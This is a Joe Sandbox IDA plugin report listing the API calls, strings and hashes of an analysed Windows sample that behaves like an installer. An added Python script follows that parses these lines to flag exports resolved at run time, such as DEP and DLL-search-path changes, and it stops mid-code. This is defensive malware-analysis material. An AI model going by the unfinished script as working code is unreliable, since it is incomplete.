                                                                                            • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$EnumLongWindows
                                                                                            • String ID: \AB
                                                                                            • API String ID: 4191631535-3948367934
                                                                                            APIs
                                                                                            • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressDeleteHandleModuleProc
                                                                                            • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                            • API String ID: 588496660-1846899949
                                                                                            Strings
                                                                                            • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                            • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                            • NextButtonClick, xrefs: 0046BC4C
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                            • API String ID: 0-2329492092
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                            • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ActiveChangeNotifyWindow
                                                                                            • String ID: $Need to restart Windows? %s
                                                                                            • API String ID: 1160245247-4200181552
                                                                                            APIs
                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                            • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                            • String ID: Creating directory: %s
                                                                                            • API String ID: 2451617938-483064649
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressByteCharMultiProcWide
                                                                                            • String ID: SfcIsFileProtected$sfc.dll
                                                                                            • API String ID: 2508298434-591603554
                                                                                            APIs
                                                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                            • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                            • RegisterClassA.USER32(?), ref: 004164CE
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Class$InfoRegisterUnregister
                                                                                            • String ID: @
                                                                                            • API String ID: 3749476976-2766056989
                                                                                            APIs
                                                                                            • 74D41520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                            • 74D41500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                            • 74D41540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: D41500D41520D41540
                                                                                            • String ID: %E
                                                                                            • API String ID: 2153611984-175436132
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0044B401
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ObjectReleaseSelect
                                                                                            • String ID: %H
                                                                                            • API String ID: 1831053106-1959103961
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                            • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                            • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: DrawText$ByteCharMultiWide
                                                                                            • String ID: %H
                                                                                            • API String ID: 65125430-1959103961
                                                                                            APIs
                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                                            • API String ID: 395431579-1506664499
                                                                                            • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                            • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                            • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                            • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                            Strings
                                                                                            • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                            • PendingFileRenameOperations, xrefs: 00455A40
                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                            • API String ID: 47109696-2115312317
                                                                                            • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                            • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                            • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                            • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                            • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                            • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                            • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                            • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                            • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                            • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                            • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                            • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                            • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                            • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                            APIs
                                                                                            • GetMenu.USER32(00000000), ref: 00421361
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu
                                                                                            • String ID:
                                                                                            • API String ID: 3711407533-0
                                                                                            • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                            • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                            • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                            • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                            APIs
                                                                                            • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$CallMessageProcSendTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 601730667-0
                                                                                            • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                            • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                            • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                            • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0042311E
                                                                                            • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDeviceEnumFontsRelease
                                                                                            • String ID:
                                                                                            • API String ID: 2698912916-0
                                                                                            • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                            • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                            • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                            • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                            APIs
                                                                                              • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                            • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                            Strings
                                                                                            • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                            • NumRecs range exceeded, xrefs: 0045C396
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$BuffersFlush
                                                                                            • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                            • API String ID: 3593489403-659731555
                                                                                            • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                            • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                            • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                            • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                            APIs
                                                                                              • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                              • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                              • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                              • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                              • Part of subcall function 004063C4: 6F551CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                              • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                              • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                              • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                              • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                              • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                              • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                              • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                              • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                              • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                              • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                              • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                              • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                              • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                              • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                              • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                              • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                              • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                              • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                              • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                              • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                              • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                              • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                            • String ID: Setup
                                                                                            • API String ID: 3870281231-3839654196
                                                                                            • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                            • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                            • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                            • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
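The API lines in these records all have one fixed shape (an optional "Part of subcall function XXXXXXXX:" prefix, then Api.MODULE(args), ref: address), and the security-relevant detail in the record above is which exports the code resolves at run time through GetModuleHandleA/LoadLibraryA and GetProcAddress instead of importing them statically (SetDllDirectoryW, SetSearchPathMode, SetProcessDEPPolicy, Wow64DisableWow64FsRedirection and so on). The Python script below is an added example, not part of the Joe Sandbox report and not code from the analysed sample. It parses lines in that format, groups resolver calls by the function they belong to and pulls the module and export names out of the printed arguments. The sample input is a handful of lines copied from this report plus two non-call lines to show they are skipped; the function names (parse_api_calls, dynamic_imports, triage) and the TRIAGE_NOTES table are my own and are assumptions for illustration.

```python
"""Parse Joe Sandbox "APIs" lines and list which exports each function resolves at run time."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: lines copied from the report above, plus two non-call lines.
SAMPLE = """\
• Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
• Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
• Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
• Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
• Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
• Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
• Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
• Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
• Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
• SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
• GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
Strings
Memory Dump Source
"""

# One call line: optional bullet, optional subcall prefix, Api.MODULE, optional "(args)",
# then ", ref: ADDRESS" (the comma and the argument list are absent on some lines).
LINE_RE = re.compile(
    r"^\s*(?:[•*-]\s*)?"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")
IDENT_RE = re.compile(r"^[A-Za-z_]\w*$")

# Calls whose printed arguments name the module or the export being resolved.
RESOLVERS = {"GetProcAddress", "GetModuleHandleA", "GetModuleHandleW",
             "LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}

# Illustrative triage notes (my own list, not from the report) for exports that change
# DLL search behaviour, the process DEP setting, or which System32 a WoW64 process sees.
TRIAGE_NOTES = {
    "SetDllDirectoryW": "changes the DLL search path of the process",
    "SetSearchPathMode": "changes the process search-path mode",
    "SetProcessDEPPolicy": "changes the DEP setting of the process",
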